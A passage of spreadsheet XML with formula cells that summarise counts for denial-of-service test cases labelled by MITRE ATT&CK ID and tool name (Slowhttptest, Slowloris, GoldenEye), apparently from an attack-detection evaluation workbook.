        <f>IF('(A) Ataques'!$AP75&lt;&gt;"NO",'(A) Ataques'!LO75,"")</f>
        <v>6</v>
      </c>
      <c r="BH75" s="471">
        <f>IF('(A) Ataques'!$AP75&lt;&gt;"NO",'(A) Ataques'!LS75,"")</f>
        <v>340</v>
      </c>
      <c r="BI75" s="331">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",IF($BD75=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ75" s="469">
        <f>'(A) Ataques'!OL75+'(A) Ataques'!OR75+'(A) Ataques'!OX75+'(A) Ataques'!PD75+'(A) Ataques'!PJ75</f>
        <v>8</v>
      </c>
      <c r="BK75" s="510">
        <f>'(A) Ataques'!ON75+'(A) Ataques'!OT75+'(A) Ataques'!OZ75+'(A) Ataques'!PF75+'(A) Ataques'!PL75</f>
        <v>8</v>
      </c>
      <c r="BL75" s="471">
        <f>'(A) Ataques'!OP75+'(A) Ataques'!OV75+'(A) Ataques'!PB75+'(A) Ataques'!PH75+'(A) Ataques'!PN75</f>
        <v>2</v>
      </c>
      <c r="BM75" s="495">
        <f>'(A) Ataques'!OH75</f>
        <v>7</v>
      </c>
      <c r="BN75" s="331">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",IF($BJ75=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO75" s="469">
        <f>IF('(A) Ataques'!$AP75&lt;&gt;"NO",'(A) Ataques'!OC75,"")</f>
        <v>8</v>
      </c>
      <c r="BP75" s="510">
        <f>IF('(A) Ataques'!$AP75&lt;&gt;"NO",'(A) Ataques'!OD75,"")</f>
        <v>8</v>
      </c>
      <c r="BQ75" s="471">
        <f>IF('(A) Ataques'!$AP75&lt;&gt;"NO",'(A) Ataques'!OE75,"")</f>
        <v>2</v>
      </c>
      <c r="BR75" s="471">
        <f>IF('(A) Ataques'!$AP75&lt;&gt;"NO",'(A) Ataques'!OF75,"")</f>
        <v>1</v>
      </c>
      <c r="BS75" s="471">
        <f>IF('(A) Ataques'!$AP75&lt;&gt;"NO",'(A) Ataques'!OJ75,"")</f>
        <v>7</v>
      </c>
      <c r="BT75" s="331">
        <f>IF('(A) Ataques'!$AK75&lt;&gt;"NO",IF($BO75=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="76" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A76" s="79">
        <f t="shared" si="1"/>
        <v>74</v>
      </c>
      <c r="B76" s="4">
        <f>IF('(A) Ataques'!AK76&lt;&gt;"NO",'(A) Ataques'!E76,"")</f>
        <v>48</v>
      </c>
      <c r="C76" s="6" t="str">
        <f>IF('(A) Ataques'!AK76&lt;&gt;"NO",IF('(A) Ataques'!M76="","",'(A) Ataques'!M76),"")</f>
        <v>T1499.002-Slowhttptest</v>
      </c>
      <c r="D76" s="4" t="str">
        <f>IF('(A) Ataques'!AK76&lt;&gt;"NO",'(A) Ataques'!F76,"")</f>
        <v>T1499</v>
      </c>
      <c r="E76" s="286">
        <f>IF('(A) Ataques'!AK76&lt;&gt;"NO",'(A) Ataques'!AQ76,"")</f>
        <v>105550</v>
      </c>
      <c r="F76" s="288">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!BB76,"")</f>
        <v>0</v>
      </c>
      <c r="G76" s="392">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!BD76,"")</f>
        <v>0</v>
      </c>
      <c r="H76" s="4">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!BF76,"")</f>
        <v>0</v>
      </c>
      <c r="I76" s="20">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!BG76,"")</f>
        <v>0</v>
      </c>
      <c r="J76" s="530">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",IF($F76=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="K76" s="322">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!$BH76,"")</f>
        <v>0</v>
      </c>
      <c r="L76" s="322">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!$BJ76,"")</f>
        <v>0</v>
      </c>
      <c r="M76" s="4">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!$BL76,"")</f>
        <v>0</v>
      </c>
      <c r="N76" s="20">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!$BM76,"")</f>
        <v>0</v>
      </c>
      <c r="O76" s="532">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",IF($K76=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P76" s="292">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!$BN76,"")</f>
        <v>0</v>
      </c>
      <c r="Q76" s="322">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!$BP76,"")</f>
        <v>0</v>
      </c>
      <c r="R76" s="4">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!$BR76,"")</f>
        <v>0</v>
      </c>
      <c r="S76" s="20">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!$BS76,"")</f>
        <v>0</v>
      </c>
      <c r="T76" s="530">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",IF($P76=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="U76" s="322">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!$BT76,"")</f>
        <v>0</v>
      </c>
      <c r="V76" s="322">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!$BV76,"")</f>
        <v>0</v>
      </c>
      <c r="W76" s="4">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!$BX76,"")</f>
        <v>0</v>
      </c>
      <c r="X76" s="20">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!$BY76,"")</f>
        <v>0</v>
      </c>
      <c r="Y76" s="532">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",IF($U76=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="Z76" s="288">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!BZ76,"")</f>
        <v>9</v>
      </c>
      <c r="AA76" s="392">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!CB76,"")</f>
        <v>9</v>
      </c>
      <c r="AB76" s="4">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!CD76,"")</f>
        <v>1</v>
      </c>
      <c r="AC76" s="20">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!CE76,"")</f>
        <v>9</v>
      </c>
      <c r="AD76" s="331">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",IF(Z76=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE76" s="322">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!$CF76,"")</f>
        <v>9</v>
      </c>
      <c r="AF76" s="322">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!$CH76,"")</f>
        <v>9</v>
      </c>
      <c r="AG76" s="4">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!$CJ76,"")</f>
        <v>1</v>
      </c>
      <c r="AH76" s="20">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!$CK76,"")</f>
        <v>9</v>
      </c>
      <c r="AI76" s="287">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",IF($AE76=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ76" s="292">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!$CL76,"")</f>
        <v>0</v>
      </c>
      <c r="AK76" s="322">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!$CN76,"")</f>
        <v>0</v>
      </c>
      <c r="AL76" s="4">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!$CP76,"")</f>
        <v>0</v>
      </c>
      <c r="AM76" s="20">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!$CQ76,"")</f>
        <v>0</v>
      </c>
      <c r="AN76" s="331">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",IF($AJ76=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO76" s="322">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!$CR76,"")</f>
        <v>0</v>
      </c>
      <c r="AP76" s="322">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!$CT76,"")</f>
        <v>0</v>
      </c>
      <c r="AQ76" s="4">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!$CV76,"")</f>
        <v>0</v>
      </c>
      <c r="AR76" s="20">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!$CW76,"")</f>
        <v>0</v>
      </c>
      <c r="AS76" s="287">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",IF($AO76=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT76" s="288">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!CX76,"")</f>
        <v>0</v>
      </c>
      <c r="AU76" s="392">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!CZ76,"")</f>
        <v>0</v>
      </c>
      <c r="AV76" s="4">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!DB76,"")</f>
        <v>0</v>
      </c>
      <c r="AW76" s="20">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",'(A) Ataques'!DC76,"")</f>
        <v>0</v>
      </c>
      <c r="AX76" s="331">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",IF($AT76=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AY76" s="469">
        <f>'(A) Ataques'!LU76+'(A) Ataques'!MA76+'(A) Ataques'!MG76+'(A) Ataques'!MM76+'(A) Ataques'!MS76</f>
        <v>0</v>
      </c>
      <c r="AZ76" s="510">
        <f>'(A) Ataques'!LW76+'(A) Ataques'!MC76+'(A) Ataques'!MI76+'(A) Ataques'!MO76+'(A) Ataques'!MU76</f>
        <v>0</v>
      </c>
      <c r="BA76" s="471">
        <f>'(A) Ataques'!LY76+'(A) Ataques'!ME76+'(A) Ataques'!MK76+'(A) Ataques'!MQ76+'(A) Ataques'!MW76</f>
        <v>0</v>
      </c>
      <c r="BB76" s="471">
        <f>'(A) Ataques'!LQ76</f>
        <v>0</v>
      </c>
      <c r="BC76" s="331">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",IF($AY76=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD76" s="469">
        <f>IF('(A) Ataques'!$AP76&lt;&gt;"NO",'(A) Ataques'!LL76,"")</f>
        <v>0</v>
      </c>
      <c r="BE76" s="510">
        <f>IF('(A) Ataques'!$AP76&lt;&gt;"NO",'(A) Ataques'!LM76,"")</f>
        <v>0</v>
      </c>
      <c r="BF76" s="471">
        <f>IF('(A) Ataques'!$AP76&lt;&gt;"NO",'(A) Ataques'!LN76,"")</f>
        <v>0</v>
      </c>
      <c r="BG76" s="471">
        <f>IF('(A) Ataques'!$AP76&lt;&gt;"NO",'(A) Ataques'!LO76,"")</f>
        <v>0</v>
      </c>
      <c r="BH76" s="471">
        <f>IF('(A) Ataques'!$AP76&lt;&gt;"NO",'(A) Ataques'!LS76,"")</f>
        <v>0</v>
      </c>
      <c r="BI76" s="331">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",IF($BD76=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BJ76" s="469">
        <f>'(A) Ataques'!OL76+'(A) Ataques'!OR76+'(A) Ataques'!OX76+'(A) Ataques'!PD76+'(A) Ataques'!PJ76</f>
        <v>0</v>
      </c>
      <c r="BK76" s="510">
        <f>'(A) Ataques'!ON76+'(A) Ataques'!OT76+'(A) Ataques'!OZ76+'(A) Ataques'!PF76+'(A) Ataques'!PL76</f>
        <v>0</v>
      </c>
      <c r="BL76" s="471">
        <f>'(A) Ataques'!OP76+'(A) Ataques'!OV76+'(A) Ataques'!PB76+'(A) Ataques'!PH76+'(A) Ataques'!PN76</f>
        <v>0</v>
      </c>
      <c r="BM76" s="495">
        <f>'(A) Ataques'!OH76</f>
        <v>0</v>
      </c>
      <c r="BN76" s="331">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",IF($BJ76=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BO76" s="469">
        <f>IF('(A) Ataques'!$AP76&lt;&gt;"NO",'(A) Ataques'!OC76,"")</f>
        <v>0</v>
      </c>
      <c r="BP76" s="510">
        <f>IF('(A) Ataques'!$AP76&lt;&gt;"NO",'(A) Ataques'!OD76,"")</f>
        <v>0</v>
      </c>
      <c r="BQ76" s="471">
        <f>IF('(A) Ataques'!$AP76&lt;&gt;"NO",'(A) Ataques'!OE76,"")</f>
        <v>0</v>
      </c>
      <c r="BR76" s="471">
        <f>IF('(A) Ataques'!$AP76&lt;&gt;"NO",'(A) Ataques'!OF76,"")</f>
        <v>0</v>
      </c>
      <c r="BS76" s="471">
        <f>IF('(A) Ataques'!$AP76&lt;&gt;"NO",'(A) Ataques'!OJ76,"")</f>
        <v>0</v>
      </c>
      <c r="BT76" s="331">
        <f>IF('(A) Ataques'!$AK76&lt;&gt;"NO",IF($BO76=0,0,1),"")</f>
        <v>0</v>
      </c>
    </row>
    <row r="77" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A77" s="79">
        <f t="shared" si="1"/>
        <v>75</v>
      </c>
      <c r="B77" s="4">
        <f>IF('(A) Ataques'!AK77&lt;&gt;"NO",'(A) Ataques'!E77,"")</f>
        <v>48</v>
      </c>
      <c r="C77" s="6" t="str">
        <f>IF('(A) Ataques'!AK77&lt;&gt;"NO",IF('(A) Ataques'!M77="","",'(A) Ataques'!M77),"")</f>
        <v>T1499.002-Slowloris</v>
      </c>
      <c r="D77" s="4" t="str">
        <f>IF('(A) Ataques'!AK77&lt;&gt;"NO",'(A) Ataques'!F77,"")</f>
        <v>T1499</v>
      </c>
      <c r="E77" s="286">
        <f>IF('(A) Ataques'!AK77&lt;&gt;"NO",'(A) Ataques'!AQ77,"")</f>
        <v>6979</v>
      </c>
      <c r="F77" s="288">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!BB77,"")</f>
        <v>1164</v>
      </c>
      <c r="G77" s="392">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!BD77,"")</f>
        <v>293</v>
      </c>
      <c r="H77" s="4">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!BF77,"")</f>
        <v>2</v>
      </c>
      <c r="I77" s="20">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!BG77,"")</f>
        <v>279</v>
      </c>
      <c r="J77" s="530">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",IF($F77=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K77" s="322">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!$BH77,"")</f>
        <v>0</v>
      </c>
      <c r="L77" s="322">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!$BJ77,"")</f>
        <v>0</v>
      </c>
      <c r="M77" s="4">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!$BL77,"")</f>
        <v>0</v>
      </c>
      <c r="N77" s="20">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!$BM77,"")</f>
        <v>0</v>
      </c>
      <c r="O77" s="532">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",IF($K77=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P77" s="292">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!$BN77,"")</f>
        <v>1164</v>
      </c>
      <c r="Q77" s="322">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!$BP77,"")</f>
        <v>293</v>
      </c>
      <c r="R77" s="4">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!$BR77,"")</f>
        <v>2</v>
      </c>
      <c r="S77" s="20">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!$BS77,"")</f>
        <v>279</v>
      </c>
      <c r="T77" s="530">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",IF($P77=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U77" s="322">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!$BT77,"")</f>
        <v>6512</v>
      </c>
      <c r="V77" s="322">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!$BV77,"")</f>
        <v>5641</v>
      </c>
      <c r="W77" s="4">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!$BX77,"")</f>
        <v>5</v>
      </c>
      <c r="X77" s="20">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!$BY77,"")</f>
        <v>4832</v>
      </c>
      <c r="Y77" s="532">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",IF($U77=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z77" s="288">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!BZ77,"")</f>
        <v>7</v>
      </c>
      <c r="AA77" s="392">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!CB77,"")</f>
        <v>7</v>
      </c>
      <c r="AB77" s="4">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!CD77,"")</f>
        <v>1</v>
      </c>
      <c r="AC77" s="20">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!CE77,"")</f>
        <v>7</v>
      </c>
      <c r="AD77" s="331">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",IF(Z77=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE77" s="322">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!$CF77,"")</f>
        <v>6519</v>
      </c>
      <c r="AF77" s="322">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!$CH77,"")</f>
        <v>5648</v>
      </c>
      <c r="AG77" s="4">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!$CJ77,"")</f>
        <v>6</v>
      </c>
      <c r="AH77" s="20">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!$CK77,"")</f>
        <v>4834</v>
      </c>
      <c r="AI77" s="287">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",IF($AE77=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ77" s="292">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!$CL77,"")</f>
        <v>0</v>
      </c>
      <c r="AK77" s="322">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!$CN77,"")</f>
        <v>0</v>
      </c>
      <c r="AL77" s="4">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!$CP77,"")</f>
        <v>0</v>
      </c>
      <c r="AM77" s="20">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!$CQ77,"")</f>
        <v>0</v>
      </c>
      <c r="AN77" s="331">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",IF($AJ77=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO77" s="322">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!$CR77,"")</f>
        <v>0</v>
      </c>
      <c r="AP77" s="322">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!$CT77,"")</f>
        <v>0</v>
      </c>
      <c r="AQ77" s="4">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!$CV77,"")</f>
        <v>0</v>
      </c>
      <c r="AR77" s="20">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!$CW77,"")</f>
        <v>0</v>
      </c>
      <c r="AS77" s="287">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",IF($AO77=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT77" s="288">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!CX77,"")</f>
        <v>1164</v>
      </c>
      <c r="AU77" s="392">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!CZ77,"")</f>
        <v>293</v>
      </c>
      <c r="AV77" s="4">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!DB77,"")</f>
        <v>2</v>
      </c>
      <c r="AW77" s="20">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",'(A) Ataques'!DC77,"")</f>
        <v>279</v>
      </c>
      <c r="AX77" s="331">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",IF($AT77=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY77" s="469">
        <f>'(A) Ataques'!LU77+'(A) Ataques'!MA77+'(A) Ataques'!MG77+'(A) Ataques'!MM77+'(A) Ataques'!MS77</f>
        <v>5733</v>
      </c>
      <c r="AZ77" s="510">
        <f>'(A) Ataques'!LW77+'(A) Ataques'!MC77+'(A) Ataques'!MI77+'(A) Ataques'!MO77+'(A) Ataques'!MU77</f>
        <v>5171</v>
      </c>
      <c r="BA77" s="471">
        <f>'(A) Ataques'!LY77+'(A) Ataques'!ME77+'(A) Ataques'!MK77+'(A) Ataques'!MQ77+'(A) Ataques'!MW77</f>
        <v>2</v>
      </c>
      <c r="BB77" s="471">
        <f>'(A) Ataques'!LQ77</f>
        <v>4657</v>
      </c>
      <c r="BC77" s="331">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",IF($AY77=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD77" s="469">
        <f>IF('(A) Ataques'!$AP77&lt;&gt;"NO",'(A) Ataques'!LL77,"")</f>
        <v>15397</v>
      </c>
      <c r="BE77" s="510">
        <f>IF('(A) Ataques'!$AP77&lt;&gt;"NO",'(A) Ataques'!LM77,"")</f>
        <v>14835</v>
      </c>
      <c r="BF77" s="471">
        <f>IF('(A) Ataques'!$AP77&lt;&gt;"NO",'(A) Ataques'!LN77,"")</f>
        <v>2</v>
      </c>
      <c r="BG77" s="471">
        <f>IF('(A) Ataques'!$AP77&lt;&gt;"NO",'(A) Ataques'!LO77,"")</f>
        <v>2</v>
      </c>
      <c r="BH77" s="471">
        <f>IF('(A) Ataques'!$AP77&lt;&gt;"NO",'(A) Ataques'!LS77,"")</f>
        <v>4832</v>
      </c>
      <c r="BI77" s="331">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",IF($BD77=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ77" s="469">
        <f>'(A) Ataques'!OL77+'(A) Ataques'!OR77+'(A) Ataques'!OX77+'(A) Ataques'!PD77+'(A) Ataques'!PJ77</f>
        <v>4904</v>
      </c>
      <c r="BK77" s="510">
        <f>'(A) Ataques'!ON77+'(A) Ataques'!OT77+'(A) Ataques'!OZ77+'(A) Ataques'!PF77+'(A) Ataques'!PL77</f>
        <v>4904</v>
      </c>
      <c r="BL77" s="471">
        <f>'(A) Ataques'!OP77+'(A) Ataques'!OV77+'(A) Ataques'!PB77+'(A) Ataques'!PH77+'(A) Ataques'!PN77</f>
        <v>4</v>
      </c>
      <c r="BM77" s="495">
        <f>'(A) Ataques'!OH77</f>
        <v>4832</v>
      </c>
      <c r="BN77" s="331">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",IF($BJ77=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO77" s="469">
        <f>IF('(A) Ataques'!$AP77&lt;&gt;"NO",'(A) Ataques'!OC77,"")</f>
        <v>4904</v>
      </c>
      <c r="BP77" s="510">
        <f>IF('(A) Ataques'!$AP77&lt;&gt;"NO",'(A) Ataques'!OD77,"")</f>
        <v>4904</v>
      </c>
      <c r="BQ77" s="471">
        <f>IF('(A) Ataques'!$AP77&lt;&gt;"NO",'(A) Ataques'!OE77,"")</f>
        <v>4</v>
      </c>
      <c r="BR77" s="471">
        <f>IF('(A) Ataques'!$AP77&lt;&gt;"NO",'(A) Ataques'!OF77,"")</f>
        <v>1</v>
      </c>
      <c r="BS77" s="471">
        <f>IF('(A) Ataques'!$AP77&lt;&gt;"NO",'(A) Ataques'!OJ77,"")</f>
        <v>4832</v>
      </c>
      <c r="BT77" s="331">
        <f>IF('(A) Ataques'!$AK77&lt;&gt;"NO",IF($BO77=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="78" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A78" s="79">
        <f t="shared" si="1"/>
        <v>76</v>
      </c>
      <c r="B78" s="4">
        <f>IF('(A) Ataques'!AK78&lt;&gt;"NO",'(A) Ataques'!E78,"")</f>
        <v>48</v>
      </c>
      <c r="C78" s="6" t="str">
        <f>IF('(A) Ataques'!AK78&lt;&gt;"NO",IF('(A) Ataques'!M78="","",'(A) Ataques'!M78),"")</f>
        <v>T1499.003-GoldenEye</v>
      </c>
      <c r="D78" s="4" t="str">
        <f>IF('(A) Ataques'!AK78&lt;&gt;"NO",'(A) Ataques'!F78,"")</f>
        <v>T1499</v>
      </c>
      <c r="E78" s="286">
        <f>IF('(A) Ataques'!AK78&lt;&gt;"NO",'(A) Ataques'!AQ78,"")</f>
        <v>26860</v>
      </c>
      <c r="F78" s="288">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!BB78,"")</f>
        <v>1590</v>
      </c>
      <c r="G78" s="392">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!BD78,"")</f>
        <v>1589</v>
      </c>
      <c r="H78" s="4">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!BF78,"")</f>
        <v>1</v>
      </c>
      <c r="I78" s="20">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!BG78,"")</f>
        <v>1589</v>
      </c>
      <c r="J78" s="530">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",IF($F78=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K78" s="322">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!$BH78,"")</f>
        <v>0</v>
      </c>
      <c r="L78" s="322">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!$BJ78,"")</f>
        <v>0</v>
      </c>
      <c r="M78" s="4">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!$BL78,"")</f>
        <v>0</v>
      </c>
      <c r="N78" s="20">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!$BM78,"")</f>
        <v>0</v>
      </c>
      <c r="O78" s="532">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",IF($K78=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P78" s="292">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!$BN78,"")</f>
        <v>1590</v>
      </c>
      <c r="Q78" s="322">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!$BP78,"")</f>
        <v>1589</v>
      </c>
      <c r="R78" s="4">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!$BR78,"")</f>
        <v>1</v>
      </c>
      <c r="S78" s="20">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!$BS78,"")</f>
        <v>1589</v>
      </c>
      <c r="T78" s="530">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",IF($P78=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U78" s="322">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!$BT78,"")</f>
        <v>28397</v>
      </c>
      <c r="V78" s="322">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!$BV78,"")</f>
        <v>15701</v>
      </c>
      <c r="W78" s="4">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!$BX78,"")</f>
        <v>2</v>
      </c>
      <c r="X78" s="20">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!$BY78,"")</f>
        <v>14112</v>
      </c>
      <c r="Y78" s="532">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",IF($U78=0,0,1),"")</f>
        <v>1</v>
